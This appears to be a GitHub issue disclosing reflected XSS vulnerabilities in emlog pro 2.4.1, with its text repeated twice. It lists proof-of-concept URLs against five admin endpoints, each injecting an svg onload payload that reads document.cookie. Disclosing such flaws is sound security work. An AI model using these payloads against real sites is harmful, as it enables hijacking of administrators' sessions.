You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
emlog pro 2.4.1 is affected by multiple reflected Cross-Site Scripting (XSS) vulnerabilities.
These vulnerabilities occur due to insufficient input validation and sanitation, allowing attackers to inject malicious scripts into web pages that are then executed in the browsers of other users.
The vulnerabilities exist due to the improper handling of some parameters. These parameters are directly concatenated into the HTML output without proper sanitization, allowing an attacker to inject arbitrary JavaScript code.
POC
For each of the identified endpoints, an attacker can exploit the vulnerability by injecting a malicious script via the respective parameter. Below are the URLs with crafted payloads that demonstrate the reflected XSS: http://target-ip/admin/tag.php?keyword=1%22%3E%3Csvg%20onload=alert(document.cookie)%3E http://target-ip/admin/user.php?keyword=1%22%3E%3Csvg%20onload=alert(document.cookie)%3E http://target-ip/admin/plugin.php?filter=1%22%3E%3C/script%3E%3Csvg%20onload=alert(document.cookie)%3E http://target-ip/admin/store.php?tag=1%22%3E%3Csvg%20onload=alert(document.cookie)%3E http://target-ip/admin/store.php?keyword=1%22%3E%3Csvg%20onload=alert(document.cookie)%3E
Impact
If a administrator accesses the malicious url, the cookie may be obtained by an attacker.
The text was updated successfully, but these errors were encountered:
Summary
emlog pro 2.4.1 is affected by multiple reflected Cross-Site Scripting (XSS) vulnerabilities.
These vulnerabilities occur due to insufficient input validation and sanitation, allowing attackers to inject malicious scripts into web pages that are then executed in the browsers of other users.
Details
This is the affected php file:
The vulnerabilities exist due to the improper handling of some parameters. These parameters are directly concatenated into the HTML output without proper sanitization, allowing an attacker to inject arbitrary JavaScript code.
POC
For each of the identified endpoints, an attacker can exploit the vulnerability by injecting a malicious script via the respective parameter. Below are the URLs with crafted payloads that demonstrate the reflected XSS:
http://target-ip/admin/tag.php?keyword=1%22%3E%3Csvg%20onload=alert(document.cookie)%3Ehttp://target-ip/admin/user.php?keyword=1%22%3E%3Csvg%20onload=alert(document.cookie)%3Ehttp://target-ip/admin/plugin.php?filter=1%22%3E%3C/script%3E%3Csvg%20onload=alert(document.cookie)%3Ehttp://target-ip/admin/store.php?tag=1%22%3E%3Csvg%20onload=alert(document.cookie)%3Ehttp://target-ip/admin/store.php?keyword=1%22%3E%3Csvg%20onload=alert(document.cookie)%3EImpact
If a administrator accesses the malicious url, the cookie may be obtained by an attacker.
The text was updated successfully, but these errors were encountered: